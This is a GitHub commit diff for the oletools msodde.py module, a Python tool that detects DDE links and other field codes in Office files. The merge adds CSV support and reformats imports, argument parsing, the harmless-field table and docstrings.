Commit 95ca88d297935a2de9175b92152713b64d3f6e6c
Committed by
GitHub
Merge pull request #241 from christian-intra2net/dde-in-csv
Dde in csv
Showing
7 changed files
with
472 additions
and
187 deletions
oletools/msodde.py
| ... | ... | @@ -9,6 +9,7 @@ Supported formats: |
| 9 | 9 | - Word 97-2003 (.doc, .dot), Word 2007+ (.docx, .dotx, .docm, .dotm) |
| 10 | 10 | - Excel 97-2003 (.xls), Excel 2007+ (.xlsx, .xlsm, .xlsb) |
| 11 | 11 | - RTF |
| 12 | +- CSV (exported from / imported into Excel) | |
| 12 | 13 | |
| 13 | 14 | Author: Philippe Lagadec - http://www.decalage.info |
| 14 | 15 | License: BSD, see source code or documentation |
| ... | ... | @@ -17,39 +18,72 @@ msodde is part of the python-oletools package: |
| 17 | 18 | http://www.decalage.info/python/oletools |
| 18 | 19 | """ |
| 19 | 20 | |
| 20 | -# === LICENSE ================================================================== | |
| 21 | +# === LICENSE ================================================================= | |
| 21 | 22 | |
| 22 | 23 | # msodde is copyright (c) 2017 Philippe Lagadec (http://www.decalage.info) |
| 23 | 24 | # All rights reserved. |
| 24 | 25 | # |
| 25 | -# Redistribution and use in source and binary forms, with or without modification, | |
| 26 | -# are permitted provided that the following conditions are met: | |
| 26 | +# Redistribution and use in source and binary forms, with or without | |
| 27 | +# modification, are permitted provided that the following conditions are met: | |
| 27 | 28 | # |
| 28 | -# * Redistributions of source code must retain the above copyright notice, this | |
| 29 | -# list of conditions and the following disclaimer. | |
| 29 | +# * Redistributions of source code must retain the above copyright notice, | |
| 30 | +# this list of conditions and the following disclaimer. | |
| 30 | 31 | # * Redistributions in binary form must reproduce the above copyright notice, |
| 31 | 32 | # this list of conditions and the following disclaimer in the documentation |
| 32 | 33 | # and/or other materials provided with the distribution. |
| 33 | 34 | # |
| 34 | -# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND | |
| 35 | -# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED | |
| 36 | -# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE | |
| 37 | -# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE | |
| 38 | -# FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL | |
| 39 | -# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR | |
| 40 | -# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER | |
| 41 | -# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, | |
| 42 | -# OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE | |
| 43 | -# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. | |
| 35 | +# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" | |
| 36 | +# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE | |
| 37 | +# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE | |
| 38 | +# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE | |
| 39 | +# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR | |
| 40 | +# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF | |
| 41 | +# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS | |
| 42 | +# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN | |
| 43 | +# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) | |
| 44 | +# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE | |
| 45 | +# POSSIBILITY OF SUCH DAMAGE. | |
| 46 | + | |
| 47 | +# -- IMPORTS ------------------------------------------------------------------ | |
| 44 | 48 | |
| 45 | 49 | from __future__ import print_function |
| 46 | 50 | |
| 47 | -#------------------------------------------------------------------------------ | |
| 51 | +import argparse | |
| 52 | +import zipfile | |
| 53 | +import os | |
| 54 | +from os.path import abspath, dirname | |
| 55 | +import sys | |
| 56 | +import json | |
| 57 | +import logging | |
| 58 | +import re | |
| 59 | +import csv | |
| 60 | + | |
| 61 | +# import lxml or ElementTree for XML parsing: | |
| 62 | +try: | |
| 63 | + # lxml: best performance for XML processing | |
| 64 | + import lxml.etree as ET | |
| 65 | +except ImportError: | |
| 66 | + import xml.etree.cElementTree as ET | |
| 67 | + | |
| 68 | +# little hack to allow absolute imports even if oletools is not installed | |
| 69 | +# Copied from olevba.py | |
| 70 | +PARENT_DIR = dirname(dirname(abspath(__file__))) | |
| 71 | +if PARENT_DIR not in sys.path: | |
| 72 | + sys.path.insert(0, PARENT_DIR) | |
| 73 | +del PARENT_DIR | |
| 74 | + | |
| 75 | +from oletools.thirdparty import olefile | |
| 76 | +from oletools import ooxml | |
| 77 | +from oletools import xls_parser | |
| 78 | +from oletools import rtfobj | |
| 79 | + | |
| 80 | +# ----------------------------------------------------------------------------- | |
| 48 | 81 | # CHANGELOG: |
| 49 | 82 | # 2017-10-18 v0.52 PL: - first version |
| 50 | 83 | # 2017-10-20 PL: - fixed issue #202 (handling empty xml tags) |
| 51 | 84 | # 2017-10-23 ES: - add check for fldSimple codes |
| 52 | -# 2017-10-24 ES: - group tags and track begin/end tags to keep DDE strings together | |
| 85 | +# 2017-10-24 ES: - group tags and track begin/end tags to keep DDE | |
| 86 | +# strings together | |
| 53 | 87 | # 2017-10-25 CH: - add json output |
| 54 | 88 | # 2017-10-25 CH: - parse doc |
| 55 | 89 | # PL: - added logging |
| ... | ... | @@ -59,10 +93,11 @@ from __future__ import print_function |
| 59 | 93 | # 2017-11-29 CH: - added support for xlsb files |
| 60 | 94 | # 2017-11-29 PL: - added support for RTF files (issue #223) |
| 61 | 95 | # 2017-12-07 CH: - ensure rtf file is closed |
| 96 | +# 2018-01-05 CH: - add CSV | |
| 62 | 97 | |
| 63 | -__version__ = '0.52dev9' | |
| 98 | +__version__ = '0.52dev10' | |
| 64 | 99 | |
| 65 | -#------------------------------------------------------------------------------ | |
| 100 | +# ----------------------------------------------------------------------------- | |
| 66 | 101 | # TODO: field codes can be in headers/footers/comments - parse these |
| 67 | 102 | # TODO: generalize behaviour for xlsx: find all external links (maybe rename |
| 68 | 103 | # command line flag for "blacklist" to "find all suspicious" or so) |
| ... | ... | @@ -71,40 +106,10 @@ __version__ = '0.52dev9' |
| 71 | 106 | # DDE-Links |
| 72 | 107 | # TODO: avoid reading complete rtf file data into memory |
| 73 | 108 | |
| 74 | -#------------------------------------------------------------------------------ | |
| 109 | +# ----------------------------------------------------------------------------- | |
| 75 | 110 | # REFERENCES: |
| 76 | 111 | |
| 77 | 112 | |
| 78 | -#--- IMPORTS ------------------------------------------------------------------ | |
| 79 | - | |
| 80 | -import argparse | |
| 81 | -import zipfile | |
| 82 | -import os | |
| 83 | -import sys | |
| 84 | -import json | |
| 85 | -import logging | |
| 86 | -import re | |
| 87 | -from struct import unpack | |
| 88 | - | |
| 89 | -# import lxml or ElementTree for XML parsing: | |
| 90 | -try: | |
| 91 | - # lxml: best performance for XML processing | |
| 92 | - import lxml.etree as ET | |
| 93 | -except ImportError: | |
| 94 | - import xml.etree.cElementTree as ET | |
| 95 | - | |
| 96 | -# little hack to allow absolute imports even if oletools is not installed | |
| 97 | -# Copied from olevba.py | |
| 98 | -_thismodule_dir = os.path.normpath(os.path.abspath(os.path.dirname(__file__))) | |
| 99 | -_parent_dir = os.path.normpath(os.path.join(_thismodule_dir, '..')) | |
| 100 | -if not _parent_dir in sys.path: | |
| 101 | - sys.path.insert(0, _parent_dir) | |
| 102 | - | |
| 103 | -from oletools.thirdparty import olefile | |
| 104 | -from oletools import ooxml | |
| 105 | -from oletools import xls_parser | |
| 106 | -from oletools import rtfobj | |
| 107 | - | |
| 108 | 113 | # === PYTHON 2+3 SUPPORT ====================================================== |
| 109 | 114 | |
| 110 | 115 | if sys.version_info[0] >= 3: |
| ... | ... | @@ -123,7 +128,9 @@ TAG_W_P = "{%s}p" % NS_WORD |
| 123 | 128 | TAG_W_R = "{%s}r" % NS_WORD |
| 124 | 129 | ATTR_W_INSTR = '{%s}instr' % NS_WORD |
| 125 | 130 | ATTR_W_FLDCHARTYPE = '{%s}fldCharType' % NS_WORD |
| 126 | -LOCATIONS = ['word/document.xml','word/endnotes.xml','word/footnotes.xml','word/header1.xml','word/footer1.xml','word/header2.xml','word/footer2.xml','word/comments.xml'] | |
| 131 | +LOCATIONS = ('word/document.xml', 'word/endnotes.xml', 'word/footnotes.xml', | |
| 132 | + 'word/header1.xml', 'word/footer1.xml', 'word/header2.xml', | |
| 133 | + 'word/footer2.xml', 'word/comments.xml') | |
| 127 | 134 | |
| 128 | 135 | # list of acceptable, harmless field instructions for blacklist field mode |
| 129 | 136 | # c.f. http://officeopenxml.com/WPfieldInstructions.php or the official |
| ... | ... | @@ -133,73 +140,74 @@ LOCATIONS = ['word/document.xml','word/endnotes.xml','word/footnotes.xml','word/ |
| 133 | 140 | # switches_with_args, switches_without_args, format_switches) |
| 134 | 141 | FIELD_BLACKLIST = ( |
| 135 | 142 | # date and time: |
| 136 | - ('CREATEDATE', 0, 0, '', 'hs', 'datetime'), | |
| 137 | - ('DATE', 0, 0, '', 'hls', 'datetime'), | |
| 138 | - ('EDITTIME', 0, 0, '', '', 'numeric'), | |
| 139 | - ('PRINTDATE', 0, 0, '', 'hs', 'datetime'), | |
| 140 | - ('SAVEDATE', 0, 0, '', 'hs', 'datetime'), | |
| 141 | - ('TIME', 0, 0, '', '', 'datetime'), | |
| 143 | + ('CREATEDATE', 0, 0, '', 'hs', 'datetime'), # pylint: disable=bad-whitespace | |
| 144 | + ('DATE', 0, 0, '', 'hls', 'datetime'), # pylint: disable=bad-whitespace | |
| 145 | + ('EDITTIME', 0, 0, '', '', 'numeric'), # pylint: disable=bad-whitespace | |
| 146 | + ('PRINTDATE', 0, 0, '', 'hs', 'datetime'), # pylint: disable=bad-whitespace | |
| 147 | + ('SAVEDATE', 0, 0, '', 'hs', 'datetime'), # pylint: disable=bad-whitespace | |
| 148 | + ('TIME', 0, 0, '', '', 'datetime'), # pylint: disable=bad-whitespace | |
| 142 | 149 | # exclude document automation (we hate the "auto" in "automation") |
| 143 | 150 | # (COMPARE, DOCVARIABLE, GOTOBUTTON, IF, MACROBUTTON, PRINT) |
| 144 | 151 | # document information |
| 145 | - ('AUTHOR', 0, 1, '', '', 'string'), | |
| 146 | - ('COMMENTS', 0, 1, '', '', 'string'), | |
| 147 | - ('DOCPROPERTY', 1, 0, '', '', 'string/numeric/datetime'), | |
| 148 | - ('FILENAME', 0, 0, '', 'p', 'string'), | |
| 149 | - ('FILESIZE', 0, 0, '', 'km', 'numeric'), | |
| 150 | - ('KEYWORDS', 0, 1, '', '', 'string'), | |
| 151 | - ('LASTSAVEDBY', 0, 0, '', '', 'string'), | |
| 152 | - ('NUMCHARS', 0, 0, '', '', 'numeric'), | |
| 153 | - ('NUMPAGES', 0, 0, '', '', 'numeric'), | |
| 154 | - ('NUMWORDS', 0, 0, '', '', 'numeric'), | |
| 155 | - ('SUBJECT', 0, 1, '', '', 'string'), | |
| 156 | - ('TEMPLATE', 0, 0, '', 'p', 'string'), | |
| 157 | - ('TITLE', 0, 1, '', '', 'string'), | |
| 152 | + ('AUTHOR', 0, 1, '', '', 'string'), # pylint: disable=bad-whitespace | |
| 153 | + ('COMMENTS', 0, 1, '', '', 'string'), # pylint: disable=bad-whitespace | |
| 154 | + ('DOCPROPERTY', 1, 0, '', '', 'string/numeric/datetime'), # pylint: disable=bad-whitespace | |
| 155 | + ('FILENAME', 0, 0, '', 'p', 'string'), # pylint: disable=bad-whitespace | |
| 156 | + ('FILESIZE', 0, 0, '', 'km', 'numeric'), # pylint: disable=bad-whitespace | |
| 157 | + ('KEYWORDS', 0, 1, '', '', 'string'), # pylint: disable=bad-whitespace | |
| 158 | + ('LASTSAVEDBY', 0, 0, '', '', 'string'), # pylint: disable=bad-whitespace | |
| 159 | + ('NUMCHARS', 0, 0, '', '', 'numeric'), # pylint: disable=bad-whitespace | |
| 160 | + ('NUMPAGES', 0, 0, '', '', 'numeric'), # pylint: disable=bad-whitespace | |
| 161 | + ('NUMWORDS', 0, 0, '', '', 'numeric'), # pylint: disable=bad-whitespace | |
| 162 | + ('SUBJECT', 0, 1, '', '', 'string'), # pylint: disable=bad-whitespace | |
| 163 | + ('TEMPLATE', 0, 0, '', 'p', 'string'), # pylint: disable=bad-whitespace | |
| 164 | + ('TITLE', 0, 1, '', '', 'string'), # pylint: disable=bad-whitespace | |
| 158 | 165 | # equations and formulas |
| 159 | - # exclude '=' formulae because they have different syntax | |
| 160 | - ('ADVANCE', 0, 0, 'dlruxy', '', ''), | |
| 161 | - ('SYMBOL', 1, 0, 'fs', 'ahju', ''), | |
| 166 | + # exclude '=' formulae because they have different syntax (and can be bad) | |
| 167 | + ('ADVANCE', 0, 0, 'dlruxy', '', ''), # pylint: disable=bad-whitespace | |
| 168 | + ('SYMBOL', 1, 0, 'fs', 'ahju', ''), # pylint: disable=bad-whitespace | |
| 162 | 169 | # form fields |
| 163 | - ('FORMCHECKBOX', 0, 0, '', '', ''), | |
| 164 | - ('FORMDROPDOWN', 0, 0, '', '', ''), | |
| 165 | - ('FORMTEXT', 0, 0, '', '', ''), | |
| 170 | + ('FORMCHECKBOX', 0, 0, '', '', ''), # pylint: disable=bad-whitespace | |
| 171 | + ('FORMDROPDOWN', 0, 0, '', '', ''), # pylint: disable=bad-whitespace | |
| 172 | + ('FORMTEXT', 0, 0, '', '', ''), # pylint: disable=bad-whitespace | |
| 166 | 173 | # index and tables |
| 167 | - ('INDEX', 0, 0, 'bcdefghklpsz', 'ry', ''), | |
| 174 | + ('INDEX', 0, 0, 'bcdefghklpsz', 'ry', ''), # pylint: disable=bad-whitespace | |
| 168 | 175 | # exclude RD since that imports data from other files |
| 169 | - ('TA', 0, 0, 'clrs', 'bi', ''), | |
| 170 | - ('TC', 1, 0, 'fl', 'n', ''), | |
| 171 | - ('TOA', 0, 0, 'bcdegls', 'fhp', ''), | |
| 172 | - ('TOC', 0, 0, 'abcdflnopst', 'huwxz', ''), | |
| 173 | - ('XE', 1, 0, 'frty', 'bi', ''), | |
| 176 | + ('TA', 0, 0, 'clrs', 'bi', ''), # pylint: disable=bad-whitespace | |
| 177 | + ('TC', 1, 0, 'fl', 'n', ''), # pylint: disable=bad-whitespace | |
| 178 | + ('TOA', 0, 0, 'bcdegls', 'fhp', ''), # pylint: disable=bad-whitespace | |
| 179 | + ('TOC', 0, 0, 'abcdflnopst', 'huwxz', ''), # pylint: disable=bad-whitespace | |
| 180 | + ('XE', 1, 0, 'frty', 'bi', ''), # pylint: disable=bad-whitespace | |
| 174 | 181 | # links and references |
| 175 | 182 | # exclude AUTOTEXT and AUTOTEXTLIST since we do not like stuff with 'AUTO' |
| 176 | - ('BIBLIOGRAPHY', 0, 0, 'lfm', '', ''), | |
| 177 | - ('CITATION', 1, 0, 'lfspvm', 'nty', ''), | |
| 183 | + ('BIBLIOGRAPHY', 0, 0, 'lfm', '', ''), # pylint: disable=bad-whitespace | |
| 184 | + ('CITATION', 1, 0, 'lfspvm', 'nty', ''), # pylint: disable=bad-whitespace | |
| 178 | 185 | # exclude HYPERLINK since we are allergic to URLs |
| 179 | 186 | # exclude INCLUDEPICTURE and INCLUDETEXT (other file or maybe even URL?) |
| 180 | 187 | # exclude LINK and REF (could reference other files) |
| 181 | - ('NOTEREF', 1, 0, '', 'fhp', ''), | |
| 182 | - ('PAGEREF', 1, 0, '', 'hp', ''), | |
| 183 | - ('QUOTE', 1, 0, '', '', 'datetime'), | |
| 184 | - ('STYLEREF', 1, 0, '', 'lnprtw', ''), | |
| 188 | + ('NOTEREF', 1, 0, '', 'fhp', ''), # pylint: disable=bad-whitespace | |
| 189 | + ('PAGEREF', 1, 0, '', 'hp', ''), # pylint: disable=bad-whitespace | |
| 190 | + ('QUOTE', 1, 0, '', '', 'datetime'), # pylint: disable=bad-whitespace | |
| 191 | + ('STYLEREF', 1, 0, '', 'lnprtw', ''), # pylint: disable=bad-whitespace | |
| 185 | 192 | # exclude all Mail Merge commands since they import data from other files |
| 186 | 193 | # (ADDRESSBLOCK, ASK, COMPARE, DATABASE, FILLIN, GREETINGLINE, IF, |
| 187 | 194 | # MERGEFIELD, MERGEREC, MERGESEQ, NEXT, NEXTIF, SET, SKIPIF) |
| 188 | 195 | # Numbering |
| 189 | - ('LISTNUM', 0, 1, 'ls', '', ''), | |
| 190 | - ('PAGE', 0, 0, '', '', 'numeric'), | |
| 191 | - ('REVNUM', 0, 0, '', '', ''), | |
| 192 | - ('SECTION', 0, 0, '', '', 'numeric'), | |
| 193 | - ('SECTIONPAGES', 0, 0, '', '', 'numeric'), | |
| 194 | - ('SEQ', 1, 1, 'rs', 'chn', 'numeric'), | |
| 195 | - # user information | |
| 196 | - ('USERADDRESS', 0, 1, '', '', 'string'), | |
| 197 | - ('USERINITIALS', 0, 1, '', '', 'string'), | |
| 198 | - ('USERNAME', 0, 1, '', '', 'string'), | |
| 196 | + ('LISTNUM', 0, 1, 'ls', '', ''), # pylint: disable=bad-whitespace | |
| 197 | + ('PAGE', 0, 0, '', '', 'numeric'), # pylint: disable=bad-whitespace | |
| 198 | + ('REVNUM', 0, 0, '', '', ''), # pylint: disable=bad-whitespace | |
| 199 | + ('SECTION', 0, 0, '', '', 'numeric'), # pylint: disable=bad-whitespace | |
| 200 | + ('SECTIONPAGES', 0, 0, '', '', 'numeric'), # pylint: disable=bad-whitespace | |
| 201 | + ('SEQ', 1, 1, 'rs', 'chn', 'numeric'), # pylint: disable=bad-whitespace | |
| 202 | + # user information # pylint: disable=bad-whitespace | |
| 203 | + ('USERADDRESS', 0, 1, '', '', 'string'), # pylint: disable=bad-whitespace | |
| 204 | + ('USERINITIALS', 0, 1, '', '', 'string'), # pylint: disable=bad-whitespace | |
| 205 | + ('USERNAME', 0, 1, '', '', 'string'), # pylint: disable=bad-whitespace | |
| 199 | 206 | ) |
| 200 | 207 | |
| 201 | 208 | FIELD_DDE_REGEX = re.compile(r'^\s*dde(auto)?\s+', re.I) |
| 202 | 209 | |
| 210 | +# filter modes | |
| 203 | 211 | FIELD_FILTER_DDE = 'only dde' |
| 204 | 212 | FIELD_FILTER_BLACKLIST = 'exclude blacklisted' |
| 205 | 213 | FIELD_FILTER_ALL = 'keep all' |
| ... | ... | @@ -229,6 +237,7 @@ LOG_LEVELS = { |
| 229 | 237 | 'critical': logging.CRITICAL |
| 230 | 238 | } |
| 231 | 239 | |
| 240 | + | |
| 232 | 241 | class NullHandler(logging.Handler): |
| 233 | 242 | """ |
| 234 | 243 | Log Handler without output, to avoid printing messages if logging is not |
| ... | ... | @@ -239,6 +248,7 @@ class NullHandler(logging.Handler): |
| 239 | 248 | def emit(self, record): |
| 240 | 249 | pass |
| 241 | 250 | |
| 251 | + | |
| 242 | 252 | def get_logger(name, level=logging.CRITICAL+1): |
| 243 | 253 | """ |
| 244 | 254 | Create a suitable logger object for this module. |
| ... | ... | @@ -251,7 +261,7 @@ def get_logger(name, level=logging.CRITICAL+1): |
| 251 | 261 | # First, test if there is already a logger with the same name, else it |
| 252 | 262 | # will generate duplicate messages (due to duplicate handlers): |
| 253 | 263 | if name in logging.Logger.manager.loggerDict: |
| 254 | - #NOTE: another less intrusive but more "hackish" solution would be to | |
| 264 | + # NOTE: another less intrusive but more "hackish" solution would be to | |
| 255 | 265 | # use getLogger then test if its effective level is not default. |
| 256 | 266 | logger = logging.getLogger(name) |
| 257 | 267 | # make sure level is OK: |
| ... | ... | @@ -292,8 +302,8 @@ def ensure_stdout_handles_unicode(): |
| 292 | 302 | # try to find encoding for sys.stdout |
| 293 | 303 | encoding = None |
| 294 | 304 | try: |
| 295 | - encoding = sys.stdout.encoding # variable encoding might not exist | |
| 296 | - except Exception: | |
| 305 | + encoding = sys.stdout.encoding | |
| 306 | + except AttributeError: # variable "encoding" might not exist | |
| 297 | 307 | pass |
| 298 | 308 | |
| 299 | 309 | if encoding not in (None, '', 'ascii'): |
| ... | ... | @@ -316,7 +326,8 @@ def ensure_stdout_handles_unicode(): |
| 316 | 326 | sys.stdout = wrapper(sys.stdout) |
| 317 | 327 | |
| 318 | 328 | |
| 319 | -ensure_stdout_handles_unicode() # e.g. for print(text) in main() | |
| 329 | +if sys.version_info.major < 3: | |
| 330 | + ensure_stdout_handles_unicode() # e.g. for print(text) in main() | |
| 320 | 331 | |
| 321 | 332 | |
| 322 | 333 | # === ARGUMENT PARSING ======================================================= |
| ... | ... | @@ -338,28 +349,34 @@ def existing_file(filename): |
| 338 | 349 | |
| 339 | 350 | def process_args(cmd_line_args=None): |
| 340 | 351 | """ parse command line arguments (given ones or per default sys.argv) """ |
| 341 | - parser = ArgParserWithBanner(description='A python tool to detect and extract DDE links in MS Office files') | |
| 352 | + parser = ArgParserWithBanner(description='A python tool to detect and ' | |
| 353 | + 'extract DDE links in MS Office files') | |
| 342 | 354 | parser.add_argument("filepath", help="path of the file to be analyzed", |
| 343 | 355 | type=existing_file, metavar='FILE') |
| 344 | 356 | parser.add_argument('-j', "--json", action='store_true', |
| 345 | 357 | help="Output in json format. Do not use with -ldebug") |
| 346 | - parser.add_argument("--nounquote", help="don't unquote values",action='store_true') | |
| 347 | - parser.add_argument('-l', '--loglevel', dest="loglevel", action="store", default=DEFAULT_LOG_LEVEL, | |
| 348 | - help="logging level debug/info/warning/error/critical (default=%(default)s)") | |
| 358 | + parser.add_argument("--nounquote", help="don't unquote values", | |
| 359 | + action='store_true') | |
| 360 | + parser.add_argument('-l', '--loglevel', dest="loglevel", action="store", | |
| 361 | + default=DEFAULT_LOG_LEVEL, | |
| 362 | + help="logging level debug/info/warning/error/critical " | |
| 363 | + "(default=%(default)s)") | |
| 349 | 364 | filter_group = parser.add_argument_group( |
| 350 | - title='Filter which OpenXML field commands are returned', | |
| 351 | - description='Only applies to OpenXML (e.g. docx) and rtf, not to OLE ' | |
| 352 | - '(e.g. .doc). These options are mutually exclusive, last ' | |
| 353 | - 'option found on command line overwrites earlier ones.') | |
| 365 | + title='Filter which OpenXML field commands are returned', | |
| 366 | + description='Only applies to OpenXML (e.g. docx) and rtf, not to OLE ' | |
| 367 | + '(e.g. .doc). These options are mutually exclusive, last ' | |
| 368 | + 'option found on command line overwrites earlier ones.') | |
| 354 | 369 | filter_group.add_argument('-d', '--dde-only', action='store_const', |
| 355 | 370 | dest='field_filter_mode', const=FIELD_FILTER_DDE, |
| 356 | 371 | help='Return only DDE and DDEAUTO fields') |
| 357 | 372 | filter_group.add_argument('-f', '--filter', action='store_const', |
| 358 | - dest='field_filter_mode', const=FIELD_FILTER_BLACKLIST, | |
| 359 | - help='Return all fields except harmless ones like PAGE') | |
| 373 | + dest='field_filter_mode', | |
| 374 | + const=FIELD_FILTER_BLACKLIST, | |
| 375 | + help='Return all fields except harmless ones') | |
| 360 | 376 | filter_group.add_argument('-a', '--all-fields', action='store_const', |
| 361 | 377 | dest='field_filter_mode', const=FIELD_FILTER_ALL, |
| 362 | - help='Return all fields, irrespective of their contents') | |
| 378 | + help='Return all fields, irrespective of their ' | |
| 379 | + 'contents') | |
| 363 | 380 | parser.set_defaults(field_filter_mode=FIELD_FILTER_DEFAULT) |
| 364 | 381 | |
| 365 | 382 | return parser.parse_args(cmd_line_args) |
| ... | ... | @@ -368,16 +385,19 @@ def process_args(cmd_line_args=None): |
| 368 | 385 | # === FUNCTIONS ============================================================== |
| 369 | 386 | |
| 370 | 387 | # from [MS-DOC], section 2.8.25 (PlcFld): |
| 371 | -# A field consists of two parts: field instructions and, optionally, a result. All fields MUST begin with | |
| 372 | -# Unicode character 0x0013 with sprmCFSpec applied with a value of 1. This is the field begin | |
| 373 | -# character. All fields MUST end with a Unicode character 0x0015 with sprmCFSpec applied with a value | |
| 374 | -# of 1. This is the field end character. If the field has a result, then there MUST be a Unicode character | |
| 375 | -# 0x0014 with sprmCFSpec applied with a value of 1 somewhere between the field begin character and | |
| 376 | -# the field end character. This is the field separator. The field result is the content between the field | |
| 377 | -# separator and the field end character. The field instructions are the content between the field begin | |
| 378 | -# character and the field separator, if one is present, or between the field begin character and the field | |
| 379 | -# end character if no separator is present. The field begin character, field end character, and field | |
| 380 | -# separator are collectively referred to as field characters. | |
| 388 | +# A field consists of two parts: field instructions and, optionally, a result. | |
| 389 | +# All fields MUST begin with Unicode character 0x0013 with sprmCFSpec applied | |
| 390 | +# with a value of 1. This is the field begin character. All fields MUST end | |
| 391 | +# with a Unicode character 0x0015 with sprmCFSpec applied with a value of 1. | |
| 392 | +# This is the field end character. If the field has a result, then there MUST | |
| 393 | +# be a Unicode character 0x0014 with sprmCFSpec applied with a value of 1 | |
| 394 | +# somewhere between the field begin character and the field end character. This | |
| 395 | +# is the field separator. The field result is the content between the field | |
| 396 | +# separator and the field end character. The field instructions are the content | |
| 397 | +# between the field begin character and the field separator, if one is present, | |
| 398 | +# or between the field begin character and the field end character if no | |
| 399 | +# separator is present. The field begin character, field end character, and | |
| 400 | +# field separator are collectively referred to as field characters. | |
| 381 | 401 | |
| 382 | 402 | |
| 383 | 403 | def process_doc_field(data): |
| ... | ... | @@ -387,7 +407,6 @@ def process_doc_field(data): |
| 387 | 407 | log.debug('processing field \'{0}\''.format(data)) |
| 388 | 408 | |
| 389 | 409 | if data.lstrip().lower().startswith(u'dde'): |
| 390 | - #log.debug('--> is DDE!') | |
| 391 | 410 | return data |
| 392 | 411 | elif data.lstrip().lower().startswith(u'\x00d\x00d\x00e\x00'): |
| 393 | 412 | return data |
| ... | ... | @@ -512,7 +531,6 @@ def process_doc(filepath): |
| 512 | 531 | return u'\n'.join(links) |
| 513 | 532 | |
| 514 | 533 | |
| 515 | - | |
| 516 | 534 | def process_xls(filepath): |
| 517 | 535 | """ find dde links in excel ole file """ |
| 518 | 536 | |
| ... | ... | @@ -531,17 +549,15 @@ def process_xls(filepath): |
| 531 | 549 | |
| 532 | 550 | |
| 533 | 551 | def process_docx(filepath, field_filter_mode=None): |
| 552 | + """ find dde-links (and other fields) in Word 2007+ files """ | |
| 534 | 553 | log.debug('process_docx') |
| 535 | 554 | all_fields = [] |
| 536 | - with zipfile.ZipFile(filepath) as z: | |
| 537 | - for filepath in z.namelist(): | |
| 555 | + with zipfile.ZipFile(filepath) as zipper: | |
| 556 | + for filepath in zipper.namelist(): | |
| 538 | 557 | if filepath in LOCATIONS: |
| 539 | - data = z.read(filepath) | |
| 558 | + data = zipper.read(filepath) | |
| 540 | 559 | fields = process_xml(data) |
| 541 | 560 | if len(fields) > 0: |
| 542 | - #print ('DDE Links in %s:'%filepath) | |
| 543 | - #for f in fields: | |
| 544 | - # print(f) | |
| 545 | 561 | all_fields.extend(fields) |
| 546 | 562 | |
| 547 | 563 | # apply field command filter |
| ... | ... | @@ -560,8 +576,10 @@ def process_docx(filepath, field_filter_mode=None): |
| 560 | 576 | .format(field_filter_mode)) |
| 561 | 577 | |
| 562 | 578 | return u'\n'.join(clean_fields) |
| 563 | - | |
| 579 | + | |
| 580 | + | |
| 564 | 581 | def process_xml(data): |
| 582 | + """ Find dde-links and other fields in office XML data """ | |
| 565 | 583 | # parse the XML data: |
| 566 | 584 | root = ET.fromstring(data) |
| 567 | 585 | fields = [] |
| ... | ... | @@ -569,39 +587,41 @@ def process_xml(data): |
| 569 | 587 | level = 0 |
| 570 | 588 | # find all the tags 'w:p': |
| 571 | 589 | # parse each for begin and end tags, to group DDE strings |
| 572 | - # fldChar can be in either a w:r element, floating alone in the w:p or spread accross w:p tags | |
| 590 | + # fldChar can be in either a w:r element, floating alone in the w:p | |
| 591 | + # or spread across w:p tags | |
| 573 | 592 | # escape DDE if quoted etc |
| 574 | 593 | # (each is a chunk of a DDE link) |
| 575 | 594 | |
| 576 | 595 | for subs in root.iter(TAG_W_P): |
| 577 | 596 | elem = None |
| 578 | - for e in subs: | |
| 579 | - #check if w:r and if it is parse children elements to pull out the first FLDCHAR or INSTRTEXT | |
| 580 | - if e.tag == TAG_W_R: | |
| 581 | - for child in e: | |
| 582 | - if child.tag == TAG_W_FLDCHAR or child.tag == TAG_W_INSTRTEXT: | |
| 597 | + for curr_elem in subs: | |
| 598 | + # check if w:r; parse children to pull out first FLDCHAR/INSTRTEXT | |
| 599 | + if curr_elem.tag == TAG_W_R: | |
| 600 | + for child in curr_elem: | |
| 601 | + if child.tag == TAG_W_FLDCHAR or \ | |
| 602 | + child.tag == TAG_W_INSTRTEXT: | |
| 583 | 603 | elem = child |
| 584 | 604 | break |
| 585 | 605 | else: |
| 586 | - elem = e | |
| 587 | - #this should be an error condition | |
| 606 | + elem = curr_elem | |
| 607 | + # this should be an error condition | |
| 588 | 608 | if elem is None: |
| 589 | 609 | continue |
| 590 | - | |
| 591 | - #check if FLDCHARTYPE and whether "begin" or "end" tag | |
| 610 | + | |
| 611 | + # check if FLDCHARTYPE and whether "begin" or "end" tag | |
| 592 | 612 | if elem.attrib.get(ATTR_W_FLDCHARTYPE) is not None: |
